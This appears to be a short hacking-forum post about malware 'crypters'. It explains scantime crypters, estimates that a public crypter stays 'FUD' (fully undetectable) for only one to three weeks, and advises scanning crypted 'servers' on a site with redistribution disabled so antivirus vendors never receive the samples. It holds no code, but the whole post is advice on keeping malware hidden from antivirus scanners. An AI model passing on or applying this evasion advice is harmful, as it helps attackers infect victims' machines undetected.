This is the one you want for all your servers and executables.

Scantime Crypter : The crypters that crypts a server that remains Undetectable upon scanning by AV's but when run in the PC gets detected by the AV.

How long my Crypter will be FUD?

Well If you have read this far chances are you still are/or will be using public crypters for a while. So chances are that your crypter will go Semi-FUD within 1-3 weeks. Depends on the crypter and your own good will.

If you want that your FUD public/private crypters to remain FUD use only novirusthanks.org with option enabled DO NOT Re-Distribute data.